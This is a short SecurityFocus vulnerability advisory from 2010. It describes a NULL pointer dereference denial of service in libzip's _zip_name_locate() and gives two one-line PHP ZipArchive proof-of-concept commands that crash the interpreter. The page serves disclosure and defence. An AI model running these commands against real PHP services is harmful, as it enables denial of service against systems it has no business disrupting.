libzip '_zip_name_locate()' NULL Pointer Dereference Denial Of Service Vulnerability

An attacker can use readily available tools to exploit this issue.

The following proofs-of-concept are available:

PoC1:
php -r '$nx=new
ZipArchive();$nx->open("/dev/null");$nx-
>locateName("a",ZIPARCHIVE::FL_UNCHANGED);'

PoC2:
php -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'


 

Privacy Statement
Copyright 2010, SecurityFocus